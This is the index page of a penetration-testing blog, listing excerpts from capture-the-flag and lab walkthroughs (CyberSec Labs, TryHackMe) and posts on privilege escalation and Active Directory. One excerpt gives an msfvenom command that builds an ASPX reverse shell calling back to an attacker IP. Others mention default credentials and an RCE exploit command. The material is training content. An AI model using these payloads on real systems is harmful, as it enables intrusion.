MYSTIKO

Secrets are meant to be secret

Weak

172.21.1.1 CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx http://172.31.1.11/shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS

172.31.1.8 Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares

172.31.1.7 CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs 172.31.1.7:/home/amir  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

Engine

172.31.1.16 CyberSec Labs Engine Walkthrough Port 80 open Gobuster finds a directory /blog It is blogengine cms which is not configured properly and has default creds admin:admin There’s an RCE exploit available for the same Python exploit.py –t 172.31.1.16/blog –l… Continue Reading →

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play  Tryhackme’s Attackingkerberos athttps://tryhackme.com/room/attackingkerberos[Task 1] Introduction This room will cover all of the basics of attacking Kerberos the windows ticket-granting service; we’ll cover the following:… Continue Reading →

The art of gaining root

Hi Guys, This is my First blog about Linux Privilege escalation. So Without wasting any time Let’s Start I’ll start with basics. So, /* WHAT IS LINUX AND PRIVILEGE ESCALATION? */ 1. Linux -: Linux is the best-known and most-used… Continue Reading →

Tryhackme – Blueprint

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Blueprint at  https://tryhackme.com/room/blueprint “Do you have what is takes to hack into this Windows Machine?” Enumeration As always we start with a nmap… Continue Reading →

Attacktive Directory – Try Hack Me

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Attacktive Directory at Challenge Task 1 Initiate the VPN connection and deploy the machine Task 2 -> Impacket Install Impacket, this is a… Continue Reading →

Android Penetration Testing: Creating Rooted AVD in Android Studio

Setting up Android testing environment if you’re looking for a platform other than Genymotion For a security enthusiast, a rooted android device is essential to perform dynamic assessments of android applications. They either rely on a physical device, or a… Continue Reading →

DNS Admin Privesc in Active Directory (AD)(Windows)

While working on a pentest lab which required abusing dnsadmin privileges, I came across this post , which is really good but felt like it didn’t properly explain few things including syntax. So this post is just an extension of… Continue Reading →

« Older posts

© 2020 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑